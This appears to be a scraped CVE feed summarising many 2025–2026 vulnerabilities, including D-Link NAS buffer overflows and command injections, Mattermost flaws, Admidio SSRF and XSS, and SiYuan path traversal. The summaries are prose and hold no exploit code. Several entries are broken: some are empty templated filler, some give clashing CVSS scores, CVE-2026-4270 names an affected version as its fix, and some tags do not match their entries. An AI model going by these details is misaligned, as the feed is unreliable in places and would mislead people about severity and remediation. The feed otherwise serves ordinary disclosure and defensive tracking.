An unrestricted file upload vulnerability exists in Technologies Integrated Management Platform version 7.17.0 that allows remote attackers to upload malicious files without authentication through the /SetWebpagePic.jsp endpoint by manipulating the targetPath/Suffix parameters. A public proof-of-concept exploit is available, though the vulnerability is not currently in CISA's Known Exploited Vulnerabilities catalog, making this a confirmed exploitable vulnerability with demonstrated attack code that could lead to unauthorized file uploads and potential remote code execution.

File Upload Integrated Management Platform
CVE-2026-4214 HIGH CVSS 8.8
Stack-based buffer overflow in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-326, DNS-1100-4, and others) through the UPnP_AV_Server_Path_Setting function in /cgi-bin/app_mgr.cgi allows authenticated remote attackers to achieve complete system compromise with high integrity, confidentiality, and availability impact. Public exploit code exists for this vulnerability, and no patch is currently available.

Buffer Overflow D-Link Stack Overflow Dns 320lw Dns 323
CVE-2026-4213 HIGH CVSS 8.8
Stack-based buffer overflow in D-Link DNS storage appliances (DNS-120, DNS-340L, DNS-1200-05 and others) through the /cgi-bin/gui_mgr.cgi endpoint allows remote authenticated attackers to achieve code execution. Public exploit code exists for this vulnerability, and no patch is currently available. Affected firmware versions are dated up to February 5, 2026.

Stack Overflow Buffer Overflow D-Link Dns 120 Dns 340l
CVE-2026-4212 HIGH CVSS 8.8
Stack-based buffer overflow in D-Link DNS NAS devices (DNS-120 through DNS-1550-04) allows authenticated attackers to achieve remote code execution via the Downloads_Schedule_Info function in /cgi-bin/download_mgr.cgi. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires valid credentials but can be executed over the network with high impact on confidentiality, integrity, and availability.

D-Link Buffer Overflow Stack Overflow Dns 1550 04 Dns 343
CVE-2026-4211 HIGH CVSS 8.8
Stack-based buffer overflow in D-Link DNS and DNR network storage devices allows authenticated remote attackers to execute arbitrary code by manipulating the f_idx parameter in the local_backup_mgr.cgi endpoint. Public exploit code exists for this vulnerability, which affects multiple device models up to firmware version 20260205 with no patch currently available. An attacker with valid credentials can trigger memory corruption to achieve complete system compromise including code execution, data theft, and service disruption.

D-Link Buffer Overflow Stack Overflow Dns 315l Dns 120
CVE-2026-4201 HIGH CVSS 7.3
An unrestricted file upload vulnerability exists in the glowxq-oj online judge system that allows remote attackers without authentication to upload malicious files through the SysFileController Upload function. A proof-of-concept exploit is publicly available, and while not currently in CISA's KEV catalog, the vulnerability poses moderate risk with a CVSS score of 7.3 and publicly disclosed exploitation code.

Java File Upload Glowxq Oj
CVE-2026-4200 HIGH CVSS 7.3
Server-side request forgery in Glowxq OJ's test case upload functionality (ProblemCaseController.java) allows unauthenticated remote attackers to make arbitrary network requests from the affected server. Public exploit code is available and the vulnerability remains unpatched, with the vendor unresponsive to disclosure attempts.

Java SSRF Glowxq Oj
CVE-2026-4194 HIGH CVSS 7.3
Improper access controls in D-Link NAS devices (DNS-120, DNS-323, DNS-345, DNS-1200-05, and others through firmware version 20260205) allow unauthenticated remote attackers to manipulate the cgi_set_wto function in /cgi-bin/system_mgr.cgi, potentially gaining unauthorized access or modifying system settings. Public exploit code exists for this vulnerability, and no patch is currently available.

D-Link Dns Privilege Escalation Authentication Bypass
CVE-2026-3476 HIGH CVSS 7.8
A code injection vulnerability in SOLIDWORKS Desktop releases 2025 through 2026 allows attackers to execute arbitrary code on victim machines by tricking users into opening specially crafted files. The vulnerability requires local access and user interaction but provides complete system compromise with high impact to confidentiality, integrity, and availability (CVSS 7.8). No evidence of active exploitation or proof-of-concept code has been reported.

RCE Code Injection Solidworks Desktop
CVE-2026-3110 HIGH CVSS 8.7
An Insecure Direct Object Reference (IDOR) vulnerability in Campus Educativa allows unauthenticated attackers to access sensitive user data including usernames, full names, email addresses, and phone numbers of all enrolled students by manipulating course IDs in the export endpoint. The vulnerability requires no authentication and can be exploited remotely through simple URL manipulation and brute-force attacks on course IDs. With a CVSS score of 8.7 and network-based attack vector, this represents a critical data exposure risk for educational institutions using Campus Educativa.

Information Disclosure Campus
CVE-2026-3022 HIGH CVSS 7.1
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma veterinary web application, specifically in the hospitalization summary generation endpoint at vets.wakyma.com. Authenticated users with low privileges can inject NoSQL commands into POST requests to exfiltrate customer reports containing sensitive veterinary and pet owner data. The vulnerability has a high CVSS score of 7.1 but requires authentication, limiting the attack surface to users with valid credentials.

SQLi Wakyma Application Web
CVE-2026-3020 HIGH CVSS 8.6
An identity-based authorization bypass vulnerability (IDOR) allows authenticated attackers to modify other users' account data, including email addresses, and subsequently hijack accounts through password reset flows. The vulnerability affects an unspecified product with a CVSS 8.6 severity rating, requires only low privileges to exploit over the network, and enables complete account takeover. No active exploitation has been reported (not in KEV), no public proof-of-concept exists, and the EPSS score is unavailable.

Authentication Bypass Wakyma Application Web
CVE-2026-2476 HIGH CVSS 7.6
A sensitive information disclosure vulnerability in Mattermost Plugins versions 2.0.3.0 and earlier fails to properly mask sensitive configuration values in support packets, allowing attackers with high privileges to extract original plugin settings from exported configuration data. The vulnerability requires authenticated access with high privileges (CVSS 7.6) and enables attackers to obtain sensitive configuration data that should be masked, potentially exposing API keys, credentials, or other sensitive plugin configurations. No active exploitation or proof-of-concept has been reported, and the vulnerability requires significant access privileges to exploit.

Information Disclosure Suse
CVE-2025-69784 HIGH CVSS 8.8
A local, non-privileged attacker can abuse a vulnerable IOCTL interface exposed by the OpenEDR 2.5.1.0 kernel driver to modify the DLL injection path used by the product.

RCE
CVE-2025-69783 HIGH CVSS 7.8
A local attacker can bypass OpenEDR's 2.5.1.0 self-defense mechanism by renaming a malicious executable to match a trusted process name (e.g., csrss.exe, edrsvc.exe, edrcon.exe).

Privilege Escalation
CVE-2025-69768 HIGH CVSS 7.5
SQL Injection vulnerability in Chyrp v.2.5.2 and before allows a remote attacker to obtain sensitive information via the Admin.php component

PHP SQLi
CVE-2025-69240 HIGH CVSS 7.5
A host header injection vulnerability in Raytha CMS allows attackers to hijack password reset tokens by spoofing X-Forwarded-Host or Host headers, leading to account takeover. The vulnerability affects all versions prior to 1.4.6 and requires only that the attacker knows the victim's email address to initiate the attack chain. With a CVSS 7.5 score and requiring user interaction, this represents a significant authentication bypass risk for organizations using the affected CMS versions.

Information Disclosure Authentication Bypass Raytha
CVE-2025-66687 HIGH CVSS 7.5
Doom Launcher 3.8.1.0 is vulnerable to Directory Traversal due to missing file path validation during the extraction of game files

Path Traversal
CVE-2025-50881 HIGH CVSS 8.8
The `flow/admin/moniteur.php` script in Use It Flow administration website before 10.0.0 is vulnerable to Remote Code Execution.

PHP RCE Code Injection
CVE-2025-15587 HIGH CVSS 8.6
A privilege escalation vulnerability in Tinycontrol network management devices (tcPDU and LAN Controllers) allows low-privileged users to retrieve administrator passwords by directly accessing resources that are hidden from the graphical interface. The vulnerability affects multiple product lines including tcPDU, LK3.5, LK3.9, and LK4 controllers across various hardware versions, with a high CVSS score of 8.6 indicating significant risk. No evidence of active exploitation exists (not in KEV), no public POC is available, and the EPSS score is not provided, but patches are available for all affected versions.

Information Disclosure Authentication Bypass Lan Kontroler V3.5 Tcpdu Lk4
CVE-2025-15540 HIGH CVSS 8.8
A code injection vulnerability in Raytha CMS's Functions module allows privileged users to execute arbitrary .NET operations through unrestricted JavaScript code execution, effectively bypassing application sandboxing. The vulnerability affects Raytha CMS versions prior to 1.4.6 and enables authenticated administrators to compromise the application's hosting environment. No active exploitation has been reported (not in KEV), no public POC is available, and EPSS data is not yet available for this recently disclosed vulnerability.

RCE Code Injection Raytha
CVE-2025-11500 HIGH CVSS 8.7
An authentication bypass vulnerability in Tinycontrol network devices (tcPDU and LAN Controllers LK3.5, LK3.9, LK4) exposes usernames and encoded passwords for both normal and admin users through unauthenticated HTTP requests to the login page. The vulnerability affects devices running older firmware versions when the secondary authentication mechanism is disabled (default setting), allowing any attacker on the local network to harvest credentials without authentication. With an EPSS score of 0.00043 and no KEV listing, this vulnerability shows low real-world exploitation activity despite its high CVSS score of 8.7.

Information Disclosure Lan Kontroler V3.5 Lk3.9 Tcpdu Lk4
CVE-2025-10685 HIGH CVSS 7.7
Heap-based buffer overflow vulnerability in Softing Industrial Automation GmbH smartLink SW-PN and smartLink SW-HT (Webserver modules) allows overflow buffers.This issue affects: smartLink SW-PN: through 1.03 smartLink SW-HT: through 1.42

Heap Overflow Buffer Overflow
CVE-2017-20222 HIGH CVSS 7.5
An unauthenticated remote reboot vulnerability exists in the Telesquare SKT LTE Router SDT-CS3B1 firmware version 1.2.0, allowing attackers to trigger device restarts without any authentication by sending specially crafted POST requests to the lte.cgi endpoint. This vulnerability has a publicly available proof-of-concept exploit and enables denial of service attacks against affected routers. The vulnerability has been assigned a high CVSS score of 7.5 due to the complete availability impact and lack of authentication requirements.

Denial Of Service Authentication Bypass Sdt Cs3b1
CVE-2026-32812 MEDIUM CVSS 6.8
An unauthenticated Server-Side Request Forgery (SSRF) and Local File Read vulnerability exists in the Admidio SSO metadata fetch endpoint, which accepts arbitrary URLs via GET parameter and passes them directly to file_get_contents() after validating only with PHP's FILTER_VALIDATE_URL-a format checker that does not block dangerous URI schemes. An authenticated administrator can exploit this to read arbitrary local files (including database credentials from config.php), probe internal network services, or fetch cloud instance metadata (such as AWS IAM credentials from 169.254.169.254). A proof-of-concept demonstrating all attack vectors has been published; CVSS 6.8 reflects high confidentiality impact but is mitigated by the requirement for administrator privileges.

CSRF Elastic PHP Microsoft SSRF
CVE-2026-32777 MEDIUM CVSS 4.0
libexpat before version 2.7.5 contains an infinite loop vulnerability triggered during DTD (Document Type Definition) parsing, allowing local attackers to cause a denial of service condition. The vulnerability affects all applications and libraries that depend on libexpat for XML parsing, with a CVSS score of 4.0 reflecting limited severity due to local-only attack vector and availability impact. While the CVSS base score is moderate, the infinite loop condition presents a real denial of service risk for services that parse untrusted XML documents containing malicious DTD content.

Denial Of Service Libexpat
CVE-2026-32776 MEDIUM CVSS 4.0
libexpat before version 2.7.5 contains a NULL pointer dereference vulnerability triggered by malformed XML containing empty external parameter entity content, resulting in denial of service through application crashes. The vulnerability affects all versions of libexpat prior to 2.7.5 across multiple platforms and applications that embed this XML parsing library. An attacker with local access can craft a malicious XML document to crash any application using vulnerable libexpat, though the impact is limited to availability (CVSS 4.0) with no code execution or data compromise possible.

Denial Of Service Null Pointer Dereference Libexpat
CVE-2026-32758 MEDIUM CVSS 6.5
Path traversal in the resourcePatchHandler allows authenticated users with Create or Rename permissions to bypass access control rules by injecting path traversal sequences (`..\`) into PATCH requests, since validation occurs before path normalization. An attacker can exploit this to copy or rename files to restricted directories that should be protected by administrator-configured deny rules. No patch is currently available.

Path Traversal
CVE-2026-32757 MEDIUM CVSS 5.4
Admidio's eCard functionality is vulnerable to stored XSS when authenticated users send greeting cards, as the application uses unsanitized POST data instead of properly filtered values during email construction. An authenticated attacker can inject malicious HTML and JavaScript into eCard emails sent to other members, bypassing the HTMLPurifier sanitization that occurs during form validation. No patch is currently available for this vulnerability affecting PHP-based Admidio installations.

PHP XSS
CVE-2026-32755 MEDIUM CVSS 5.7
Admidio's profile membership management function fails to validate CSRF tokens on the save_membership action, allowing an attacker to forge requests that modify membership start and end dates for any member of roles led by the victim. While other membership-related actions (stop_membership, remove_former_membership) include CSRF protection, save_membership was omitted from validation, enabling silent privilege escalation or access revocation through cross-site request forgery. A proof-of-concept exists demonstrating immediate exploitation by embedding a form on an external page.

CSRF PHP
CVE-2026-32750 MEDIUM CVSS 6.8
SiYuan Note contains an unrestricted path traversal vulnerability in the POST /api/import/importStdMd endpoint that allows authenticated administrators to recursively import arbitrary files from the host filesystem into the workspace database without any validation or blocklisting. Affected versions of SiYuan (pkg:go/github.com_siyuan-note_siyuan) allow admin users to permanently store sensitive files such as /proc/, /etc/, /run/secrets/, and other system directories as searchable note content, making them accessible to other workspace users including those with limited privileges. A proof-of-concept has been published demonstrating import of /proc/1/ and /run/secrets/, and when chained with separate SQL injection vulnerabilities in the renderSprig template function, non-admin users can retrieve imported secrets without additional privileges.

Path Traversal SQLi Docker
CVE-2026-32747 MEDIUM CVSS 6.8
Administrative users of Docker and PostgreSQL deployments can exploit an incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files like container environment variables and Docker secrets from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on a blocklist-based validation mechanism that fails to prevent access to these critical system paths. Since no patch is currently available, organizations should restrict administrative access to the affected API endpoint until an update is released.

Docker PostgreSQL Path Traversal
CVE-2026-32723 MEDIUM
SandboxJS 0.8.34 contains a race condition where a shared global tick state allows concurrent sandboxes to interfere with each other's execution quotas during timer callback compilation. An attacker in a multi-tenant environment can exploit this to bypass resource limits and exhaust CPU/memory on the host system. A patch is available.

Race Condition Denial Of Service Node.js
CVE-2026-32632 MEDIUM CVSS 5.9
The Glances system monitoring application accepts arbitrary HTTP Host headers on its REST API and WebUI endpoints, enabling DNS rebinding attacks that bypass browser same-origin policy and expose sensitive system data. While the MCP endpoint was recently hardened with host validation, the main FastAPI application for REST/WebUI/token routes lacks equivalent TrustedHostMiddleware protection, allowing attackers to rebind attacker-controlled domains to the victim's local Glances instance and read API responses as same-origin content. A proof-of-concept is code-validated through source inspection, and a patch is available in version 4.5.2 and later.

Python RCE
CVE-2026-32587 MEDIUM CVSS 5.4
WP EasyPay versions up to 4.2.11 contain an authorization bypass that allows authenticated users to modify plugin settings and functionality beyond their intended access level. An attacker with valid credentials could exploit improperly configured access controls to perform unauthorized actions such as disabling security features or altering payment processing configurations. No patch is currently available for this vulnerability.

Authentication Bypass Wp Easypay
CVE-2026-32583 MEDIUM CVSS 5.3
Modern Events Calendar versions up to 7.29.0 contain an access control vulnerability that allows unauthenticated remote attackers to modify data through improperly configured authorization checks. This vulnerability enables attackers to perform unauthorized actions without authentication, affecting all installations of the affected versions. No patch is currently available, requiring organizations to implement alternative mitigation strategies.

Authentication Bypass Modern Events Calendar
CVE-2026-32265 MEDIUM
The BucketsController endpoint in this plugin suffers from an information disclosure vulnerability where unauthenticated attackers possessing a valid CSRF token can enumerate the list of accessible buckets. This exposure allows reconnaissance of cloud storage resources available to the plugin without requiring authentication. Update to version 2.2.5 to resolve this issue.

CSRF Information Disclosure Authentication Bypass
CVE-2026-32262 MEDIUM CVSS 4.3
Path traversal in Craft CMS AssetsController allows authenticated users with replaceFiles permission to delete arbitrary files on local filesystems by injecting directory traversal sequences into the targetFilename parameter, potentially affecting files across multiple volumes sharing the same filesystem root. The vulnerability exists because user input is processed by deleteFile() before proper sanitization is applied. Users should upgrade to Craft 4.17.5 or 5.9.11 to resolve this issue.

Path Traversal
CVE-2026-30882 MEDIUM CVSS 6.1
Chamilo LMS versions 1.11.34 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability in the session category listing page where the keyword parameter is echoed directly into an HTML href attribute without encoding or sanitization. An attacker can inject arbitrary JavaScript by breaking out of the attribute context using a ">" payload, enabling session hijacking, credential theft, or malware distribution to any user who clicks a malicious link. The vulnerability is triggered when pagination controls render for datasets exceeding 20 items, and a patch is available in version 1.11.36.

XSS Chamilo Lms
CVE-2026-30876 MEDIUM CVSS 5.3
A security vulnerability in Chamilo LMS (CVSS 5.3). Remediation should follow standard vulnerability management procedures.

Information Disclosure Chamilo Lms
CVE-2026-29521 MEDIUM CVSS 5.1
Hereta ETH-IMC408M devices running firmware 1.0.15 and earlier are vulnerable to cross-site request forgery attacks that allow unauthenticated remote attackers to modify device configuration through setup.cgi, including adding RADIUS accounts and altering network settings. The vulnerability exploits missing CSRF protections combined with automatic inclusion of HTTP Basic Authentication credentials, requiring only user interaction to trigger the attack. No patch is currently available.

CSRF
CVE-2026-29520 MEDIUM CVSS 5.1
Reflected XSS in Hereta ETH-IMC408M firmware versions 1.0.15 and earlier enables attackers to inject malicious scripts through the Network Diagnosis ping function's ping_ipaddr parameter. An attacker can craft a malicious link that, when clicked by an authenticated administrator, executes arbitrary JavaScript in their browser session, potentially compromising the device. No patch is currently available.

XSS
CVE-2026-29516 MEDIUM CVSS 4.9
CVE-2026-29516 is a security vulnerability (CVSS 4.9) that allows authenticated attackers. Remediation should follow standard vulnerability management procedures.

PHP Information Disclosure Terastation Nas Ts5400r
CVE-2026-29513 MEDIUM CVSS 5.1
Stored XSS in Hereta ETH-IMC408M firmware v1.0.15 and earlier allows authenticated users to execute arbitrary JavaScript in other users' browsers via unsanitized input in the Device Location field on the System Status interface. An attacker with valid credentials can inject malicious scripts that persist and execute when legitimate users access the status page, potentially enabling session hijacking or credential theft. No patch is currently available.

XSS
CVE-2026-29510 MEDIUM CVSS 5.1
Stored XSS in Hereta ETH-IMC408M firmware versions 1.0.15 and earlier enables authenticated attackers to execute arbitrary JavaScript in the System Status interface by injecting malicious code through the Device Name field. The vulnerability affects any user viewing the compromised status page, potentially leading to session hijacking or credential theft. No patch is currently available for this issue.

XSS
CVE-2026-28499 MEDIUM CVSS 6.1
LeafKit's HTML escaping mechanism fails to properly sanitize arrays and dictionaries when rendered via templates, enabling cross-site scripting (XSS) attacks where untrusted data is output unescaped. Applications using LeafKit templates to display user-controlled collections are vulnerable to arbitrary JavaScript execution in user browsers. A patch is available to address this vulnerability.

XSS
CVE-2026-28490 MEDIUM CVSS 6.5
Authlib's implementation of the JWE RSA1_5 key management algorithm contains a padding oracle vulnerability that leaks decryption failures through timing and exception patterns, allowing attackers to decrypt sensitive data without the private key. The library disabled the constant-time protections provided by the underlying cryptography library and raises exceptions before tag validation completes, creating a reliable side-channel. Public exploit code exists for this vulnerability affecting Authlib users in Python and related Oracle products.

Oracle Python RCE Redhat Suse
CVE-2026-27448 MEDIUM CVSS 5.3
CVE-2026-27448 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Information Disclosure Redhat Suse
CVE-2026-26304 MEDIUM CVSS 4.3
Mattermost versions 11.3.0 and 11.2.2 and earlier fail to properly validate the run_create permission when a playbook ID is empty, allowing authenticated team members to create unauthorized playbook runs through the API. This permission bypass could enable attackers with valid credentials to perform actions they should not be permitted to execute within the platform.

Authentication Bypass Mattermost Suse
CVE-2026-26246 MEDIUM CVSS 4.3
Mattermost fails to properly bound memory allocation when processing PSD (Photoshop) image files, allowing authenticated attackers to exhaust server memory and trigger denial of service by uploading a specially crafted PSD file. The vulnerability affects Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier. With a CVSS score of 4.3 and a low attack complexity requirement, this represents a moderate but exploitable risk for organizations running affected versions where user file upload is permitted.

Denial Of Service Mattermost Suse
CVE-2026-25783 MEDIUM CVSS 4.3
Mattermost fails to properly validate User-Agent header tokens in versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier, allowing authenticated attackers to trigger request panics through specially crafted User-Agent headers. This denial-of-service vulnerability affects availability but requires prior authentication and results in only low-severity impact. While the CVSS score of 4.3 reflects the low severity, the practical risk depends on whether the application is exposed to untrusted authenticated users and whether automatic exploitation tools are readily available.

Information Disclosure Mattermost Suse
CVE-2026-25780 MEDIUM CVSS 4.3
Mattermost versions 11.3.0, 11.2.2, and 10.11.10 and earlier lack proper memory bounds checking when processing DOC file uploads, enabling authenticated attackers to trigger server memory exhaustion and denial of service. An attacker with valid credentials can upload a specially crafted DOC file to exhaust available memory and crash the Mattermost server. This vulnerability currently lacks a patch and affects multiple active versions of the platform.

Denial Of Service Mattermost Suse
CVE-2026-24692 MEDIUM CVSS 4.3
A remote code execution vulnerability (CVSS 4.3) that allows guest users without read permissions. Remediation should follow standard vulnerability management procedures.

Authentication Bypass Mattermost Server Suse
CVE-2026-21991 MEDIUM CVSS 5.5
The DTrace dtprobed component contains a path traversal vulnerability (CWE-22) that allows local attackers with limited privileges to create arbitrary files on the system by supplying crafted USDT provider names. This vulnerability affects Oracle Linux 8, 9, and 10, and while it carries a CVSS score of 5.5, the EPSS score of 0.01% (percentile 2%) indicates very low exploitation probability in the wild, with no evidence of active exploitation or public proof-of-concept code.

Path Traversal
CVE-2026-21386 MEDIUM CVSS 4.3
CVE-2026-21386 is a security vulnerability (CVSS 4.3) that allows an authenticated team member. Remediation should follow standard vulnerability management procedures.

Information Disclosure Mattermost Server Suse
CVE-2026-21004 MEDIUM CVSS 6.9
Smart Switch versions prior to 3.7.69.15 contain an improper authentication vulnerability that allows adjacent network attackers to trigger denial of service conditions without requiring user privileges or interaction. The vulnerability has a CVSS score of 6.9 with medium-to-high availability impact, making it a notable threat in local network environments where Smart Switch is deployed.

Denial Of Service Authentication Bypass
CVE-2026-21002 MEDIUM CVSS 5.9
Galaxy Store prior to version 4.6.03.8 contains an improper cryptographic signature verification vulnerability that allows a local attacker to install arbitrary applications without proper authorization. An attacker with physical or local access to a device can bypass the signature validation mechanism, enabling installation of malicious or unauthorized apps. While the CVSS score of 5.9 is moderate, the integrity impact is high, making this a meaningful threat to device security and app ecosystem integrity.

Information Disclosure Jwt Attack
CVE-2026-21001 MEDIUM CVSS 5.9
Galaxy Store versions prior to 4.6.03.8 contain a path traversal vulnerability that enables local attackers to create files with Galaxy Store privileges. This could allow an attacker with local access to escalate their capabilities by writing malicious files in unintended locations. No patch is currently available for this issue.

Path Traversal
CVE-2026-20997 MEDIUM CVSS 5.3
Smart Switch prior to version 3.7.69.15 contains an improper cryptographic signature verification vulnerability that allows remote attackers to bypass authentication mechanisms. The vulnerability has a CVSS score of 5.3 with network-based attack vector and low complexity, requiring only user interaction. While no public exploit or KEV status has been confirmed, the authentication bypass capability presents a moderate risk for unauthorized access to affected devices.

Authentication Bypass Jwt Attack
CVE-2026-20995 MEDIUM CVSS 5.3
Smart Switch versions prior to 3.7.69.15 contain an exposure of sensitive functionality vulnerability that allows remote attackers to set specific configurations without proper authorization. An unauthenticated attacker can leverage network access to manipulate configuration settings on affected devices, potentially leading to information disclosure and integrity compromise. This vulnerability requires user interaction according to the CVSS vector, suggesting a social engineering or phishing component may be necessary for successful exploitation.

Authentication Bypass
CVE-2026-20993 MEDIUM CVSS 4.8
Samsung Assistant versions prior to 9.3.10.7 contain an improper export of Android application components vulnerability that allows a local attacker with low privilege access to read sensitive saved information from the application. The vulnerability has a CVSS score of 4.8 with low complexity and no user interaction required, making it a moderate-risk issue affecting users on vulnerable Samsung devices. While no active exploitation or public proof-of-concept is documented at this time, the local attack vector and information disclosure impact warrant timely patching.

Information Disclosure Samsung Google
CVE-2026-20991 MEDIUM CVSS 4.4
ThemeManager prior to the SMR Mar-2026 Release 1 contains an improper privilege management vulnerability that allows local privileged attackers to inappropriately reuse trial contents, potentially circumventing licensing restrictions or trial period limitations. With a CVSS score of 6.7 and requiring high privileges (PR:H) but no user interaction, this vulnerability poses a moderate integrity risk in environments where multiple privileged users share access to ThemeManager systems. No public proof-of-concept or active exploitation has been reported in the CVE record, and this does not appear on CISA's KEV catalog, suggesting limited real-world weaponization at present.

Information Disclosure
CVE-2026-20988 MEDIUM CVSS 5.0
A broadcast receiver in Android Settings fails to properly verify intents prior to the March 2026 Security Maintenance Release 1, allowing a local attacker with limited privileges to launch arbitrary activities with Settings-level permissions. The vulnerability requires user interaction to trigger and carries a CVSS 4.0 score of 6.8, reflecting high confidentiality and integrity impact. No public exploit or KEV designation is currently documented, but the local attack vector and privilege escalation potential warrant prompt patching.

Information Disclosure
CVE-2026-4284 MEDIUM CVSS 4.7
The PPT File Handler in taoofagi easegen-admin contains a server-side request forgery vulnerability in the downloadFile function that allows authenticated remote attackers to manipulate file URLs and access arbitrary network resources. Public exploit code exists for this vulnerability, and the vendor has not provided patches or updates despite notification. The flaw affects Java-based deployments using the affected rolling release version.

SSRF Java
CVE-2026-4270 MEDIUM CVSS 5.5
AWS API MCP Server versions 0.2.14 through 1.3.9 contain an improper path protection flaw in the no-access and workdir features that allows local attackers to bypass file access restrictions and read arbitrary files accessible to the MCP client application. An attacker with local access and user interaction can exploit this vulnerability to expose sensitive local file contents. Users should upgrade to version 1.3.9 or later to remediate this issue.

Authentication Bypass Aws Api Mcp Server
CVE-2026-4265 MEDIUM CVSS 4.3
This vulnerability in Mattermost allows guest users to bypass team-specific file upload permissions through a cross-team file metadata reuse attack. Affected versions include Mattermost 11.3.0, 11.2.x up to 11.2.2, and 10.11.x up to 10.11.10. An authenticated guest user can upload a file in a team where they have upload_file permission, then reuse that file's metadata in POST requests to channels in different teams where they lack upload permission, resulting in unauthorized file posting with potential integrity impact.

Authentication Bypass Mattermost
CVE-2026-4253 MEDIUM CVSS 4.7
OS command injection in Tenda AC8 16.03.50.11 web interface allows authenticated remote attackers to execute arbitrary commands through the wans.policy.list1 parameter in the /cgi-bin/UploadCfg endpoint. Public exploit code exists for this vulnerability and no patch is currently available.

Tenda Command Injection
CVE-2026-4241 MEDIUM CVSS 6.3
SQL injection in itsourcecode College Management System 1.0 allows authenticated attackers to manipulate the course_code parameter in /admin/time-table.php and execute arbitrary SQL commands remotely. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires valid credentials but can lead to unauthorized data access, modification, or deletion within the application database.

PHP SQLi
CVE-2026-4240 MEDIUM CVSS 5.3
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.

Denial Of Service
CVE-2026-4238 MEDIUM CVSS 4.7
SQL injection in itsourcecode College Management System 1.0 via the course_code parameter in /admin/courses.php allows authenticated administrators to execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, and no patch is currently available. The attack requires high-level privileges but could enable data exfiltration or manipulation.

SQLi PHP College Management System
CVE-2026-4234 MEDIUM CVSS 6.3
SQL injection in SSCMS 7.4.0 via the tableHandWrite parameter in SitesAddController.Submit.cs allows authenticated remote attackers to execute arbitrary SQL commands. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification.

SQLi Remote Code Execution Sscms
CVE-2026-4233 MEDIUM CVSS 4.3
Path traversal in ThingsGateway 12's /api/file/download endpoint allows authenticated users to read arbitrary files through manipulation of the fileName parameter. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early notification.

Path Traversal Information Disclosure Thingsgateway
CVE-2026-4230 MEDIUM CVSS 6.3
SQL injection in Vanna up to version 2.0.2 allows authenticated remote attackers to execute arbitrary SQL queries through the update_sql endpoint function. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. An authenticated attacker can leverage this to read, modify, or delete database contents depending on the application's database permissions.

Python SQLi AI / ML Vanna
CVE-2026-4228 MEDIUM CVSS 6.3
Command injection in LB-LINK BL-WR9000 2.4.9 via the /goform/set_wifi endpoint allows authenticated remote attackers to execute arbitrary commands with network access. Public exploit code is available for this vulnerability, and no patch has been released by the vendor despite early disclosure notification.

Command Injection
CVE-2026-4224 MEDIUM CVSS 6.0
A buffer overflow vulnerability (CVSS 6.0). Remediation should follow standard vulnerability management procedures.

Buffer Overflow
CVE-2026-4216 MEDIUM CVSS 5.3
Hard-coded credentials exist in the i-SENS SmartLog Android application (versions up to 2.6.8) within a developer mode function used for Bluetooth pairing configuration between blood glucose meters and the mobile app. An attacker with local access and low privileges can exploit this to obtain credentials, potentially compromising the integrity and confidentiality of health data. A public proof-of-concept is available, though the CVSS 5.3 score and local-only attack vector limit immediate widespread exploitation risk.

Google Information Disclosure Smartlog App Android
CVE-2026-4215 MEDIUM CVSS 6.3
Server-side request forgery in FlowCI flow-core-x up to version 1.23.01 allows authenticated remote attackers to conduct SSRF attacks through the SMTP Host Handler configuration function. Public exploit code exists for this vulnerability and the vendor has not released a patch. An attacker with valid credentials can manipulate the system to make arbitrary outbound requests from the affected server.

Java SSRF Flow Core X
CVE-2026-4210 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-320, DNS-327L, DNS-345 and others) through the time_machine.cgi script allows authenticated remote attackers to execute arbitrary commands with network access. Public exploit code exists for this vulnerability, and no patch is currently available.

D-Link Command Injection RCE Dns 320 Dns 345
CVE-2026-4209 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNS-325, DNR-322L, DNS-327L and others) allows authenticated remote attackers to execute arbitrary commands through multiple user and group management CGI functions. Public exploit code exists for this vulnerability, and patches are not currently available. An attacker with valid credentials could leverage this to compromise the NAS system and potentially access or manipulate stored data.

D-Link Command Injection RCE Dns 325 Dnr 322l
CVE-2026-4207 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-320, DNS-325, DNS-343, DNR-322L and others) through the /cgi-bin/system_mgr.cgi interface allows authenticated remote attackers to execute arbitrary commands. Public exploit code exists for this vulnerability, and no patch is currently available.

D-Link Command Injection RCE Dnr 322l Dns 325
CVE-2026-4206 MEDIUM CVSS 6.3
A security vulnerability in A vulnerability (CVSS 6.3). Risk factors: public PoC available.

D-Link Command Injection RCE Dns 315l Dns 325
CVE-2026-4205 MEDIUM CVSS 6.3
A security vulnerability in A vulnerability (CVSS 6.3). Risk factors: public PoC available.

Command Injection D-Link RCE Ftp Dns 320
CVE-2026-4204 MEDIUM CVSS 6.3
A security vulnerability in A flaw (CVSS 6.3). Risk factors: public PoC available.

Command Injection D-Link RCE Dns 726 4 Dns 323
CVE-2026-4203 MEDIUM CVSS 6.3
Command injection in D-Link DNS and DNR network attached storage devices allows authenticated remote attackers to execute arbitrary commands through multiple CGI functions in the network management interface. The vulnerability affects numerous models up to firmware version 20260205, and public exploit code is available. An attacker with valid credentials can leverage this to compromise device integrity and potentially access the network.

Command Injection D-Link RCE Dhcp Dns
CVE-2026-4199 MEDIUM CVSS 5.3
Command injection in bazinga012 mcp_code_executor up to version 0.3.0 allows local attackers with user-level privileges to execute arbitrary commands through the installDependencies function in src/index.ts. Public exploit code exists for this vulnerability, affecting Python and Node.js environments. A patch is available and should be applied to remediate this local privilege escalation risk.

